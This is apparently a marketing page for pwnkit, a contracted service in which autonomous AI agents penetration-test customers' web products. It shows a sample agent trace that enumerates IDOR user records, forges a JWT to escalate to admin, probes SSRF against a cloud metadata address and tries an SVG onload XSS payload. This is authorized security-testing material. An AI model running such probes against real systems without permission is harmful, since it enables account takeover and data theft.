Powered by our in-house leading OSS engine
pwnkit
CLI Cloud
Request access
Private release · Zürich, Switzerland

Autonomous AI agents.
Hacking your product.
On contract.

A finding lands in your queue only after the agent re-ran it against your live target. The request, the response, and the full tool trace are in the report.

Request access

Outperforms commercial pentest teams on the public XBOW benchmark. Real-world CVEs disclosed via the open-source engine. Read the methodology at docs.pwnkit.com.

Watch the loop

Every finding lands with the trace
that produced it.

A live replay from a recent engagement, redacted. Each row is a tool call the agent issued against the target — the same trace ships in the report under every finding.

live engagement · your-website.com · 16h 22m elapsed
47 traces · 3 findings
14:32:11 http_get /api/users/me 200 · 1.2kB · session ok
14:32:13 cookie_parse session=eyJ1aWQiOjQy... uid=42 role=user
14:32:15 idor_probe /api/users/41 200 · leaked email
14:32:18 idor_probe /api/users/40 200 · leaked email
14:32:21 finding IDOR · /api/users/{id} HIGH · cross-tenant read
14:32:24 http_get /api/admin/audit 403 · forbidden
14:32:27 jwt_decode authorization: bearer ey... alg=HS256 exp=+1h
14:32:30 jwt_resign role=user → role=admin forged · 312 chars
14:32:33 http_get /api/admin/audit 200 · 47kB · accepted
14:32:36 finding BROKEN_AUTH · jwt secret CRITICAL · privilege escalation
14:32:39 dom_xss_test /search?q=<svg/onload=...> reflected · sanitised
14:32:42 sqlmap_probe /api/orders?id=1 parameterised · clean
14:32:45 ssrf_probe image_url=http://169.254... 500 · loopback hit
14:32:48 finding SSRF · image proxy MEDIUM · metadata exposure
14:32:51 http_get /.git/config 404
14:32:54 http_get /api/_internal/health 200 · build=a2f1c
tool trace · streaming hover to pause

What this is not

Four things you
will not get here.

Every head of AppSec has run a POC that wasted a week. These are the four patterns buyers have learned to distrust — and what we deliberately do instead.

Not a self-serve scanner.

No "start free trial" button. No credit-card form. You cannot point a free scanner at your own production estate the morning of an incident, and we know you have tried.

01

Not a chatbot bolted onto a Burp report.

No LLM wrapper around tools you already own. A separate engine with its own methodology and its own audit trail — built to chain a medium IDOR and a medium SSRF into a critical data-exfil path, not to summarise a Nuclei run.

02

Not an SDR-led sales motion.

No discovery call. No qualification call. No deck about what the roadmap might ship next quarter. The first conversation is with the person who will run your first scan.

03

Not a black-box vendor.

The engine is open source. Your security team reads the prompts, tool list, and scoring harness before they trust a single finding. Every other vendor in this category ships a number you cannot verify.

04
How we run

We do not ship
what we cannot defend.

One engagement at a time, reviewed by the person who wrote the engine. No demo deck, no public price list, no shared queues.

01

The operator built the engine.

The person running your scan wrote the code, signs your contract, and answers your team’s follow-up questions in the same thread.

02

Audit trail, not a PDF.

Every action logged with timestamp, prompt, tool call, model version, and outcome — exported in a shape your SOC 2 auditor will actually accept.

03

Safe-mode by default.

Signed scope, action allowlist, and a kill switch you pull from your side. The agent will not issue a destructive call unless your scope explicitly authorises it.

04

The engine is open source.

Your security team reads the prompts, tool list, and scoring harness before the first finding lands — not after an incident review.

What it does

Four moves.
One engagement.

For the head of AppSec at a Series C SaaS who already knows the next pentest is six months out. These are the four things the agent actually does.

01 / Schedule

Runs on every deploy, not once a year.

The agent re-attacks your production estate on the cadence you set — on-push, nightly, or the morning before a release — so your next pentest is never six months out.

02 / Chain

Chains findings the way an attacker would.

It maps your auth flow, walks the IDOR into an SSRF into a credential leak, and only reports the chain once it has reproduced the full exploit end to end.

03 / Disclose

Reports written for the auditor who asks.

Each finding ships with the exact request, the exact response, the tool trace, the model version, and a reproduction you can paste into Burp.

04 / Privacy

Single-tenant. Your data is not training data.

One contract, one estate, one isolated runner pool — no cross-customer context, no shared model fine-tuning, deleted on the schedule your contract sets.
FAQ

Questions we answer
before you ask.

The seven questions every CTO and CISO evaluation call ends up at by minute eight. Answered up front so the first call can be about your estate, not ours.

Tell us what you
need to defend.

If your next pentest is six months out and you cannot tell your board why, the form is below. We read every inquiry by hand and reply within one business day — usually with a no, sometimes with a calendar link.

Request access Read the source